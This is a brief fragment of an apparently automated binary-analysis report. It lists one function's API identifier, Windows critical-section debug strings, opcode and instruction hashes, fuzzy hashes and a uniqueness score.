                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                  • API String ID: 885266447-3903918235
                  • Opcode ID: 8c234fc9c07d516d75c7599d19e282778e14fca37d09166cd029fb5c16fd4be4
                  • Instruction ID: a4843125a9ce4946c374dc1e76af55a1342276d23a806ab14c9c45447ecf41d8
                  • Opcode Fuzzy Hash: 8c234fc9c07d516d75c7599d19e282778e14fca37d09166cd029fb5c16fd4be4
                  • Instruction Fuzzy Hash: 03F028366002007FD6205A45CC01F63BB6EEB41730F140216F624495D2D962F87082A0
                  Uniqueness

                  Uniqueness Score: -1.00%